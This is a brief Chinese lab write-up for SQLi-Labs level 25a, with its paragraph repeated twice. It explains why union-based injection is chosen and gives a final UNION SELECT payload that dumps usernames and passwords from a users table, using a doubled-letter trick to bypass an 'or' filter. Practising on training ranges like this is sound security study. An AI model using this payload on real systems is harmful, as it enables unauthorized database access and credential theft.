25a
不同于25关的是sql语句中对于id没有单引号包含,同时没有输出错误项,故报错注入不能用。
有两种方式:延时注入和联合注入;本文采用联合注入。
具体过程不再详述,本文给出最终POC:
?id=-1 union select 1,group_concat(username,passwoorrd),3 from users --+
具体过程本文不再赘述,可移至本专栏相关文章:SQLiLabs靶场专栏
不同于25关的是sql语句中对于id没有单引号包含,同时没有输出错误项,故报错注入不能用。
有两种方式:延时注入和联合注入;本文采用联合注入。
具体过程不再详述,本文给出最终POC:
?id=-1 union select 1,group_concat(username,passwoorrd),3 from users --+
具体过程本文不再赘述,可移至本专栏相关文章:SQLiLabs靶场专栏
